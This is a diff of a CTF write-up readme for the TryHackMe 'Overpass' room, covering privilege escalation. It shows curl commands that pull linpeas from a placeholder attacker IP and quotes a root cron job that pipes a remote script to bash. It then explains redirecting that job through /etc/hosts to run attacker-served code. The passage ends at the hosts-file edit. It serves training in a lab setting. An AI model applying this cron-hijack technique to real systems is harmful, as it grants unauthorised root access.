olezim/writeups/tryhackme/overpass/readme.md

 In case we would input the wrong password, it would prompt us *Sorry, try again!*, which is not happening.
 This means, we cannot use `sudo -l`, but we made sure that the password we found out is correct.

 ### Privilege escalation
 Lets start by getting [linpeas](https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS) on the target.
-It helps a lot to determine possible attacking vectors.
-Just download the linpeas.sh on the attacker machine, start a http-server with `python3 -m http.server 8080`and curl it on the target with `curl attackerip:8080/linpeas.sh -o linpeas.sh`.
+It helps a lot to determine possible attack vectors.
+Just download the linpeas.sh on the attacker machine, start a http-server with `python3 -m http.server 8080` and curl it on the target with `curl <OUR-IP>:8080/linpeas.sh -o linpeas.sh`.
 After running and going through the output, this catched my attention:
 `* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash `.
 The target does run a cronjob every minute as *root*.
 It curls a file (buildscript.sh) from a specific IP and executes it. "overpass.thm" is basically just a hostname which is mapped to a specific IP-address.
 If we are able to change the corresponding IP-address to one we control, we could upload whatever we want and it would get executed, as long as we keep the path correct (<OUR-IP>/downloads/src/buildscript.sh).
-The necessary information about these hostnames are within /etc/hosts and luckily, the user james has write-access to it!
+The necessary information about these hostnames are within */etc/hosts* and luckily, the user james has write-access to it!

 1. edit the associated IP for overpass.thm - `vim /etc/hosts`
 ```
 127.0.0.1 localhost